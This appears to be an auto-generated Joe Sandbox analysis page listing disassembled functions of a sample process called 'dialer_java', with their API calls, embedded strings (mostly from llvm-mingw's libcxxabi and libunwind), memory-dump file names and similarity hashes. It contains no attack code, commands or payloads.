String ID: 'unnamed$/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$Parser->TemplateParams.size() >= OldNumTemplateParamLists
API String ID: 2140428464-3850676658
Opcode ID: e98f4957bddb08b3f0627d313fe1925ccf5ed37af1ae49de47ac71d8d8f7d74b
Instruction ID: d4c69ff5f3f1f37a41718a411e10b2fbe7049ed4090cd19d5a9a510bad1e9f8c
Opcode Fuzzy Hash: e98f4957bddb08b3f0627d313fe1925ccf5ed37af1ae49de47ac71d8d8f7d74b
Instruction Fuzzy Hash: D441D2B3B06B8282DE28CF4AE4863B967A5EB54BC4F048531CB9E57795EF3DD0818301

Function 00007FF6E3A6D9A0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 103COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6E3A6DA1E
malloc.MSVCRT ref: 00007FF6E3A6DA57
memcpy.MSVCRT ref: 00007FF6E3A6DA9B
_assert.MSVCRT ref: 00007FF6E3A6DAF8
_assert.MSVCRT ref: 00007FF6E3A6DB12

Strings

FromPosition <= Names.size(), xrefs: 00007FF6E3A6DAE4
Index <= size() && "dropBack() can't expand!", xrefs: 00007FF6E3A6DAFE
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6E3A6DAEB, 00007FF6E3A6DB05

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: _assertmalloc$memcpy
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$FromPosition <= Names.size()$Index <= size() && "dropBack() can't expand!"
API String ID: 4247363904-2992651634
Opcode ID: ab644f2095f0de27027b3e7fa25ecf4aaf29523574def526dacc6e54c99405ee
Instruction ID: 53dc66c38df8ca31d5c5759287c03fa564fd9d4e6442b7d00b650405d59e68e9
Opcode Fuzzy Hash: ab644f2095f0de27027b3e7fa25ecf4aaf29523574def526dacc6e54c99405ee
Instruction Fuzzy Hash: B341BF73729A4280EA249B0DE8497A97BA0FB547C4F494039EE5D6B791EE3DE4C4C309

Function 00007FF6E3A63F50 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 98COMMON

Download Yara Rule

APIs

fflush.MSVCRT ref: 00007FF6E3A63F8F

Part of subcall function 00007FF6E3A64120: fflush.MSVCRT ref: 00007FF6E3A6422D
Part of subcall function 00007FF6E3A64120: fflush.MSVCRT ref: 00007FF6E3A64287

RtlUnwindEx.KERNEL32 ref: 00007FF6E3A640A6
fflush.MSVCRT ref: 00007FF6E3A64106
abort.MSVCRT ref: 00007FF6E3A6410B

Strings

_Unwind_Resume, xrefs: 00007FF6E3A640E6
libunwind: _Unwind_Resume(ex_obj=%p), xrefs: 00007FF6E3A63F73
_Unwind_Resume() can't return, xrefs: 00007FF6E3A640ED
libunwind: %s - %s, xrefs: 00007FF6E3A640DF

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: fflush$Unwindabort
String ID: _Unwind_Resume$_Unwind_Resume() can't return$libunwind: %s - %s$libunwind: _Unwind_Resume(ex_obj=%p)
API String ID: 3252057912-3900785416
Opcode ID: 67d0ddd8d3f3b324f54b87a857e904e5ecbaa43cf9483693f48d384fd3c00ca7
Instruction ID: f0f09905e26c6bbde862b4f06fa334cf614e9713fe9aab5b246702b13644eed4
Opcode Fuzzy Hash: 67d0ddd8d3f3b324f54b87a857e904e5ecbaa43cf9483693f48d384fd3c00ca7
Instruction Fuzzy Hash: 16416E22E1CBC181F6369B18A4163F9A774FFD9384F005226EA8C12665EF7ED2D2C745

Function 00007FF6E3A645B0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 59COMMON

Download Yara Rule

APIs

fflush.MSVCRT ref: 00007FF6E3A646AC
abort.MSVCRT ref: 00007FF6E3A646B1

Strings

unsupported register, xrefs: 00007FF6E3A64693, 00007FF6E3A647DA
getReg, xrefs: 00007FF6E3A6468C
libunwind: %s - %s, xrefs: 00007FF6E3A64685, 00007FF6E3A647CC
setReg, xrefs: 00007FF6E3A647D3

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: abortfflush
String ID: getReg$libunwind: %s - %s$setReg$unsupported register
API String ID: 4129902348-1024193272
Opcode ID: 5b2f10e133d415561be2da49aee555f4cb851904708bcff335edbf3d1aada5b7
Instruction ID: 651edc1413b16fc8d0b4b7c4112c091210269d1deeac265331184ec02dad6339
Opcode Fuzzy Hash: 5b2f10e133d415561be2da49aee555f4cb851904708bcff335edbf3d1aada5b7
Instruction Fuzzy Hash: D5115462F0A59B51EA14AB5DA85F3B81F56DF81781F40803AD50DA33A6DE3EA582C307

Function 00007FF6E3A72797 Relevance: 13.6, APIs: 9, Instructions: 95COMMON

Download Yara Rule

APIs

isxdigit.MSVCRT ref: 00007FF6E3A727B2
isxdigit.MSVCRT ref: 00007FF6E3A727C4
isxdigit.MSVCRT ref: 00007FF6E3A727D6
isxdigit.MSVCRT ref: 00007FF6E3A727E8
isxdigit.MSVCRT ref: 00007FF6E3A727FA
isxdigit.MSVCRT ref: 00007FF6E3A7280C
isxdigit.MSVCRT ref: 00007FF6E3A7281E
isxdigit.MSVCRT ref: 00007FF6E3A72830
malloc.MSVCRT ref: 00007FF6E3A7287D

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: isxdigit$malloc
String ID:
API String ID: 1399014089-0
Opcode ID: d11516b59d51969ee5f2a2bb7cdc1212a3f385caa4d96bde6dca3ab53278bab5
Instruction ID: 14fcf3f01b1f3c4309c0a14f768ac40f4bcb36554c11ba5b80dee1988eafe36c
Opcode Fuzzy Hash: d11516b59d51969ee5f2a2bb7cdc1212a3f385caa4d96bde6dca3ab53278bab5
Instruction Fuzzy Hash: 60418523708F8282E7584F38E49537A6BA4BB44F41F084175CAADA66D5DF7DE4E1C305

Function 00007FF6E3A7B110 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 183COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6E3A7B24B
realloc.MSVCRT ref: 00007FF6E3A7B2C5

Strings

basic_string, xrefs: 00007FF6E3A7B2FB, 00007FF6E3A7B340
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6E3A7B41D
allocator, xrefs: 00007FF6E3A7B302, 00007FF6E3A7B347
starts_with(SV, "basic_"), xrefs: 00007FF6E3A7B416

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: mallocrealloc
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$allocator$basic_string$starts_with(SV, "basic_")
API String ID: 948496778-4167058683
Opcode ID: 9392a488f175509cc51113372d72a0b877b6c5a8ab6e9babe2c6c6985595158c
Instruction ID: 02ac2b0f4d4df6a05bb346250d64fbddae422c0fe589f830a1e4b38dfe606d9b
Opcode Fuzzy Hash: 9392a488f175509cc51113372d72a0b877b6c5a8ab6e9babe2c6c6985595158c
Instruction Fuzzy Hash: 5461E2A3B06B8681DB148B19E4897BD7BA0EB04B84F448232DB5D977D4DF3DE192C349

Function 00007FF6E3A7B520 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6E3A7B55B
realloc.MSVCRT ref: 00007FF6E3A7B5D1
memcpy.MSVCRT ref: 00007FF6E3A7B5EF
realloc.MSVCRT ref: 00007FF6E3A7B62E
realloc.MSVCRT ref: 00007FF6E3A7B694
realloc.MSVCRT ref: 00007FF6E3A7B6F3

Strings

or<char>, xrefs: 00007FF6E3A7B6B0

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: realloc$memcpy
String ID: or<char>
API String ID: 1833655766-3520798227
Opcode ID: c86a95940dfd59be5a52cadd960e1fa1a6bb2816d717a95559760d92432bfea2
Instruction ID: df57e3db1fa30eb5ad5b7f6cf5b8fe84a861f3cf47c20babcd8bdf6fd1534fd6
Opcode Fuzzy Hash: c86a95940dfd59be5a52cadd960e1fa1a6bb2816d717a95559760d92432bfea2
Instruction Fuzzy Hash: 1C5182B3A06B8682DE258F59E5953A9B761EB95BC4F00C132CB8E57795EF3CE180C305

Function 00007FF6E3A67F50 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 124COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 00007FF6E3A6804A
_assert.MSVCRT ref: 00007FF6E3A6809B
calloc.MSVCRT ref: 00007FF6E3A680DD
memset.MSVCRT ref: 00007FF6E3A68106

Strings

reinterpret_cast<size_t>(ptr) % RequiredAlignment == 0, xrefs: 00007FF6E3A68036
reinterpret_cast<size_t>(p + 1) % RequiredAlignment == 0, xrefs: 00007FF6E3A68087
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/fallback_malloc.cpp, xrefs: 00007FF6E3A6803D, 00007FF6E3A6808E

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: _assert$callocmemset
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/fallback_malloc.cpp$reinterpret_cast<size_t>(p + 1) % RequiredAlignment == 0$reinterpret_cast<size_t>(ptr) % RequiredAlignment == 0
API String ID: 1513271871-212362933
Opcode ID: dbf2372e7721cb1b03cfe6cbe79d7301f27338ad5526d3f9cf38ec1b38bf5fea
Instruction ID: 6188ab9744db7334354b19850b0a162094f93c7051a57e5acd56ceb7ff506dd3
Opcode Fuzzy Hash: dbf2372e7721cb1b03cfe6cbe79d7301f27338ad5526d3f9cf38ec1b38bf5fea
Instruction Fuzzy Hash: 2741E553B3965380FA159F1DA817BB93BA9AF51780F414031C91EA3794EE3FA582C30A

Function 00007FF6E3A62730 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,?,?,00007FF6E3A8FEF8,00007FF6E3A8FEF8,?,?,00007FF6E3A60000,?,00007FF6E3A62521), ref: 00007FF6E3A627F3
VirtualProtect.KERNEL32(?,?,?,?,00007FF6E3A8FEF8,00007FF6E3A8FEF8,?,?,00007FF6E3A60000,?,00007FF6E3A62521), ref: 00007FF6E3A62857
memcpy.MSVCRT ref: 00007FF6E3A62870
GetLastError.KERNEL32(?,?,?,?,00007FF6E3A8FEF8,00007FF6E3A8FEF8,?,?,00007FF6E3A60000,?,00007FF6E3A62521), ref: 00007FF6E3A628B3

Strings

VirtualProtect failed with code 0x%x, xrefs: 00007FF6E3A628B9
VirtualQuery failed for %d bytes at address %p, xrefs: 00007FF6E3A628A7
Address %p has no image-section, xrefs: 00007FF6E3A62884

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: Virtual$ErrorLastProtectQuerymemcpy
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
API String ID: 2595394609-2123141913
Opcode ID: 9138589ab96e5059ed5b91dbf10de36bae820b7dd10cec232302c703205bbebd
Instruction ID: c6fc43f25b4a9a7d8732d3b1ef9871a52f8369be64381eed896d46df069eae4e
Opcode Fuzzy Hash: 9138589ab96e5059ed5b91dbf10de36bae820b7dd10cec232302c703205bbebd
Instruction Fuzzy Hash: 0D41B2A3B1964291EA108B1DE8467B83FA1FB95F80F104472CD0EE3791CE3EE585C74A

Function 00007FF6E3A7B372 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6E3A7B3E6
memcpy.MSVCRT ref: 00007FF6E3A7B400
_assert.MSVCRT ref: 00007FF6E3A7B42A

Strings

basi, xrefs: 00007FF6E3A7B39A
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6E3A7B41D
basic_ostream, xrefs: 00007FF6E3A7B377
starts_with(SV, "basic_"), xrefs: 00007FF6E3A7B416

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: _assertmemcpyrealloc
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$basi$basic_ostream$starts_with(SV, "basic_")
API String ID: 2326172077-1855325571
Opcode ID: daff190b208ee239b92a8ff6802495cf067ff4514613a718e17146f5ae89fa4f
Instruction ID: 33bf734396f08eaad5ae40a6ef0176289b6f25cb36e3fafc694a9e8eec21a36b
Opcode Fuzzy Hash: daff190b208ee239b92a8ff6802495cf067ff4514613a718e17146f5ae89fa4f
Instruction Fuzzy Hash: 4611C4F3F0574282EA688B0DF5853796BA1EF54BC5F448035CA4D97A94EF2EE1D18305

Function 00007FF6E3A61880 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 33COMMON

Download Yara Rule

APIs

abort.MSVCRT(00000000,00000000,00000000,?,00007FF6E3A61C09), ref: 00007FF6E3A619EF
_assert.MSVCRT ref: 00007FF6E3A61A08

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/cxa_personality.cpp, xrefs: 00007FF6E3A619FB, 00007FF6E3A62148, 00007FF6E3A62162, 00007FF6E3A6217C
actions & (_UA_SEARCH_PHASE | _UA_FORCE_UNWIND), xrefs: 00007FF6E3A6215B
actions & _UA_SEARCH_PHASE, xrefs: 00007FF6E3A62175
(base != 0) && "DW_EH_PE_datarel is invalid with a base of 0", xrefs: 00007FF6E3A619F4
actions & (_UA_SEARCH_PHASE | _UA_HANDLER_FRAME | _UA_FORCE_UNWIND), xrefs: 00007FF6E3A62141

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: _assertabort
String ID: (base != 0) && "DW_EH_PE_datarel is invalid with a base of 0"$/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/cxa_personality.cpp$actions & (_UA_SEARCH_PHASE | _UA_FORCE_UNWIND)$actions & (_UA_SEARCH_PHASE | _UA_HANDLER_FRAME | _UA_FORCE_UNWIND)$actions & _UA_SEARCH_PHASE
API String ID: 1072228434-30274522
Opcode ID: 446287974f43067f5742b1829c412f7f497fe5859eb705efff3feace76f7cb6b
Instruction ID: 390e2591692bba896839b38e2c3588f784e7d2e8542f148179b5353f9cfa3ad4
Opcode Fuzzy Hash: 446287974f43067f5742b1829c412f7f497fe5859eb705efff3feace76f7cb6b
Instruction Fuzzy Hash: DEF0E223F2894690EA74879EEC876B42F189F147A5F410932DD1DE62E0ED3EE4C7C206

Function 00007FF6E3A74BE0 Relevance: 12.2, APIs: 8, Instructions: 247COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6E3A74C16
realloc.MSVCRT ref: 00007FF6E3A74D5F
realloc.MSVCRT ref: 00007FF6E3A74DB9
memcpy.MSVCRT ref: 00007FF6E3A74DD7
realloc.MSVCRT ref: 00007FF6E3A74E3C
realloc.MSVCRT ref: 00007FF6E3A74EB0
memcmp.MSVCRT ref: 00007FF6E3A74EE5
realloc.MSVCRT ref: 00007FF6E3A74F25

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: realloc$mallocmemcmpmemcpy
String ID:
API String ID: 2517790541-0
Opcode ID: 7346dd3206704345a6af56fcc80ff1099bfbb1bfe8e3ddd91a199a9fc1cc2900
Instruction ID: f52af862b89fb3cb4ead39d402a58b908d03a95bafeffebf6a500ab6eeef16db
Opcode Fuzzy Hash: 7346dd3206704345a6af56fcc80ff1099bfbb1bfe8e3ddd91a199a9fc1cc2900
Instruction Fuzzy Hash: 7E91E3B3B06B8282EB258F1AE4453A977A4FB54B84F048135CF9D57795EF3DE4928304

Function 00007FF6E3A75480 Relevance: 12.2, APIs: 8, Instructions: 222COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6E3A754BF
realloc.MSVCRT ref: 00007FF6E3A7550E
realloc.MSVCRT ref: 00007FF6E3A75568
realloc.MSVCRT ref: 00007FF6E3A755C6
realloc.MSVCRT ref: 00007FF6E3A75623
realloc.MSVCRT ref: 00007FF6E3A75670
realloc.MSVCRT ref: 00007FF6E3A756FC
realloc.MSVCRT ref: 00007FF6E3A75757

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: realloc
String ID:
API String ID: 471065373-0
Opcode ID: 820f43f822463fb6ccee1dd20fe9ec16f7cf86f838d61afeeac975018113ba4f
Instruction ID: 4aa5f039bd664470e192ba3fe29a9e26590df6c9f8d7d626dd209411a4b3bd9f
Opcode Fuzzy Hash: 820f43f822463fb6ccee1dd20fe9ec16f7cf86f838d61afeeac975018113ba4f
Instruction Fuzzy Hash: D89172B3A05B8283EA249F59F0553ADB761EB58BC4F408531CB8E577A4EF3DE0818305

Function 00007FF6E3A671C0 Relevance: 10.9, APIs: 7, Instructions: 368COMMON

Download Yara Rule

APIs

fputwc.MSVCRT ref: 00007FF6E3A67424
fputwc.MSVCRT ref: 00007FF6E3A6743B
fputwc.MSVCRT ref: 00007FF6E3A674B0

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

